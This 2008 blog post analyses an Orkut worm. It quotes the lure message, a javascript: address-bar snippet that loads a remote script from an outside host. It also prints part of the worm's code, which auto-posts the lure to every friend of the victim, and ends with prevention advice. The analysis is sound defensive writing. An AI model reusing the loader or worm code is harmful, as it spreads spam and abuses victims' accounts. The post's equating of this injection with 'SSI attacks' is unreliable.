8 Feb 2008

Orkut scripts exposed

I generally do not check out the scripts sent to me in scraps by frens. But this was one script which kept coming to me from different directions...from many various frens who dont know each other. So i thought it must be something worth trying or maybe its a SPAM. So i took a chance and tried it out to my utter amazement. The script did not have any effect on my browser,and thats what made me feel nervous thinking if it had not blown and security policies or exploited any vulnerabilities etc. So i made a search on it and found that the scraps are not only on my scrapbook but on all my friends on my list. So i decided to uncover what this script do behind the scenes.

Javascript files can be nasty piece of code which perform a particular function depending on what it was written for. Its really worth watching out for scripts on Orkut as you never know if that script could land you in jail under IT Act for spreading Trojans or Viruses. These scripts can run from the address bar of the Browser. When you enter a script in the address bar and press enter, the script directs you to another site or link or maybe perform some function the the page. These scripts can also be injected into the server directly. This is called Server Side Include (SSI) attacks and injects the piece of script directly into the server. This is generally done on Guestbooks,Feedback forms etc of a website which directly posts messages to the server.

Heres the scrap:
Here are some cool pic..BY JINESH JAIN.. Just copy the JavaScript, paste it in your address bar and PRESS ENTER
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)
trust me, you'll find this pic funny!


The javascript source code:
function SendScrapToAll()
{
var scrapText;
scrapText = "[blue]Here are some cool pic..BY [green]JINESH JAIN[/green].. [blue]Just copy the JavaScript, paste it in your address bar and PRESS ENTER[/blue]" +
""+
"[orange]javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)[/orange]"+
""+
"[red]trust me, you'll find thispic funny! [:)] ";
if(c == select.length)
return;
try{
if(select[c].value!="")
{
sendScrap(select[c].value,scrapText);
}
}catch(e){
//Suppressed Exception
} finally {
c = c+ 1;
setTimeout("SendScrapToAll()", 666);
}
}

What the script does?
The script fetches the current logged-on user's friends list from Compose.aspx page, builds AJAX based WebRequests and posts the scrap message to everyone on that list. And if you have more than 150 friends..sending more than 150 messages at a time will make Orkut admin look like SPAMMING and yo might even be blocked for some time to access your orkut account.

Prevention is better than Cure
There is not definite cure for such script injection but you can delete each scrap individually.
Inform your friends about this script and never try such scripts in future even if it maybe tempting.

Courtesy:
Coolwayfarer's Diary
Code Maverick

Disqus

comments powered by Disqus